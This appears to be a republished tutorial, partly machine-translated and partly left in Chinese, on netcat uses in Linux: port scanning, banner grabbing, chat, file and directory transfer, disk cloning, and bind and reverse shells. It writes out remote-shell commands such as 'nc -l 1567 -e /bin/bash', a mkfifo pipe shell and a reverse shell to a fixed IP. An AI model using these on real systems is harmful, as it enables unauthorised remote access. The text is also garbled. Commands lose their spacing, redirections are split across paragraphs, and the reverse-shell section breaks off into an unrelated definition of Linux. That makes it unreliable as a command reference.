Shulou(Shulou.com)06/01 Report--

What is the purpose of the Netcat command in Linux? In view of this problem, this article introduces the corresponding analysis and answers in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible way.

1, Port scan

Port scanning is often used by system administrators and hackers to find ports open on some machines to help them identify vulnerabilities in the system.

$nc-z-v-n 172.31.100.7 21-25

You can run in TCP or UDP mode, and the default is to adjust the TCP,-u parameter to udp.

Z parameter tells netcat to use 0 IO, close the connection immediately after the connection is successful, and do not exchange data (thanks for @ jxing instructions)

The v parameter refers to the use of redundancy options.

The n parameter tells netcat not to use DNS to reverse query the domain name of the IP address

This command prints all open ports from 21 to 25. Banner is a text, and Banner is a text message sent to you by a service to which you are connected. Banner information is very useful when you are trying to identify vulnerabilities or types and versions of services. However, not all services send banner.

Once you find open ports, you can easily use the netcat connection service to crawl their banner.

$nc-v 172.31.100.7 21

The netcat command connects to open port 21 and prints the banner information of the service running on that port.

Chat Server

If you want to talk to your friends, there are many software and information services available for you to use. However, if you don't have such a luxurious configuration, such as you are in a computer lab, and all external connections are restricted, how can you communicate with your friends who sit in the next room all day? Don't be depressed, netcat provides a way for you to create a Chat server, a predetermined port, so that he can contact you.

Server

$nc-l 1567

The netcat command starts a tcp server on port 1567, to which all standard output and input are output. Both the output and input are shown in this shell.

Client

$nc 172.31.100.7 1567

Whatever you type on machine B will appear on machine A.

3, file transfer

Most of the time, we are trying to transfer files through the network or other tools. There are many ways, such as FTP,SCP,SMB, etc., but when you only need to transfer files temporarily or at once, it's really worth wasting time installing and configuring software to your machine. Suppose you want to send a file file.txt from A to B. Either An or B can be used as a server or a client. Below, let A be the server and B the client.

Server

$nc-l 1567

< file.txt Client $nc -n 172.31.100.7 1567 >

File.txt

Here we create a server on An and redirect the input of netcat to the file file.txt, so when any successful connection to that port, netcat will send the file contents of file.

On the client side, we redirect the output to file.txt. When B connects to A Magi A to send the file content, B saves the file content to file.txt.

There is no need to create a file source as a Server, but we can use it the other way around. Like below we send files from B to A, but the server is created on A, this time we only need to redirect the output of netcat and redirect the input file of B.

B as Server

Server

$nc-l 1567 > file.txt

Client

Nc 172.31.100.23 1567

< file.txt 4，目录传输 发送一个文件很简单，但是如果我们想要发送多个文件，或者整个目录，一样很简单，只需要使用压缩工具tar，压缩后发送压缩包。 如果你想要通过网络传输一个目录从A到B。 Server $tar -cvf - dir_name | nc -l 1567 Client $nc -n 172.31.100.7 1567 | tar -xvf - 这里在A服务器上，我们创建一个tar归档包并且通过-在控制台重定向它，然后使用管道，重定向给netcat，netcat可以通过网络发送它。 在客户端我们下载该压缩包通过netcat 管道然后打开文件。 如果想要节省带宽传输压缩包，我们可以使用bzip2或者其他工具压缩。 Server $tar -cvf - dir_name| bzip2 -z | nc -l 1567 通过bzip2压缩 Client $nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf - 使用bzip2解压 5. 加密你通过网络发送的数据 如果你担心你在网络上发送数据的安全，你可以在发送你的数据之前用如mcrypt的工具加密。 服务端 $nc localhost 1567 | mcrypt -flush -bare -F -q -d -m ecb >

File.txt

Use the mcrypt tool to encrypt data.

Client

$mcrypt-flush-bare-F-Q-m ecb

< file.txt | nc -l 1567 使用mcrypt工具解密数据。 以上两个命令会提示需要密码，确保两端使用相同的密码。 这里我们是使用mcrypt用来加密，使用其它任意加密工具都可以。 6. 流视频 虽然不是生成流视频的最好方法，但如果服务器上没有特定的工具，使用netcat，我们仍然有希望做成这件事。 服务端 $cat video.avi | nc -l 1567 这里我们只是从一个视频文件中读入并重定向输出到netcat客户端 $nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 - 这里我们从socket中读入数据并重定向到mplayer。 7，克隆一个设备 如果你已经安装配置一台Linux机器并且需要重复同样的操作对其他的机器，而你不想在重复配置一遍。不在需要重复配置安装的过程，只启动另一台机器的一些引导可以随身碟和克隆你的机器。 克隆Linux PC很简单，假如你的系统在磁盘/dev/sda上 Server $dd if=/dev/sda | nc -l 1567 Client $nc -n 172.31.100.7 1567 | dd of=/dev/sda dd是一个从磁盘读取原始数据的工具，我通过netcat服务器重定向它的输出流到其他机器并且写入到磁盘中，它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区，我们可以根据我们系统root分区的位置，更改sda 为sda1，sda2.等等。 8，打开一个shell 我们已经用过远程shell-使用telnet和ssh，但是如果这两个命令没有安装并且我们没有权限安装他们，我们也可以使用netcat创建远程shell。 假设你的netcat支持 -c -e 参数(默认 netcat) Server $nc -l 1567 -e /bin/bash -i Client $nc 172.31.100.7 1567 这里我们已经创建了一个netcat服务器并且表示当它连接成功时执行/bin/bash 假如netcat 不支持-c 或者 -e 参数（openbsd netcat）,我们仍然能够创建远程shell Server $mkfifo /tmp/tmp_fifo $cat /tmp/tmp_fifo | /bin/sh -i 2>

& 1 | nc-l 1567 > / tmp/tmp_fifo

Here we create a fifo file and then use the pipe command to direct the contents of the fifo file to shell 2 > & 1. Is used to redirect standard error output and standard output, and then piped to port 1567 on which netcat is running. At this point, we have redirected the output of netcat to the fifo file.

Description:

Input received from the network is written to the fifo file

The cat command reads the fifo file and sends its contents to the sh command

The sh command process is typed and written back to netcat.

Netcat sends output to client over the network

As for why it succeeds because the pipe causes the command to execute in parallel, the fifo file is used to replace the normal file, because fifo makes the read wait, and if it is a normal file, the cat command ends as soon as possible and starts reading the empty file.

The client simply connects to the server

Client

$nc-n 172.31.100.7 1567

You will get a shell prompt on the client side

Reverse shell

Reverse shell refers to the shell that is opened on the client side. Reverse shell is so named because it is different from other configurations, where the server uses services provided by the customer.

Server side

$nc-l 1567

On the client side, simply tell netcat to execute shell after the connection is complete.

Client

$nc 172.31.100.7 1567-e / bin/bash

Now, what's so special about reverse shell?

What is Linux system Linux is a free-to-use and free-spread UNIX-like operating system, is a POSIX-based multi-user, multi-task, multi-threaded and multi-CPU operating system, using Linux can run major Unix tools, applications and network protocols.

The answers to the questions about the role of the Netcat command in Linux are shared here. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel to learn more about it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.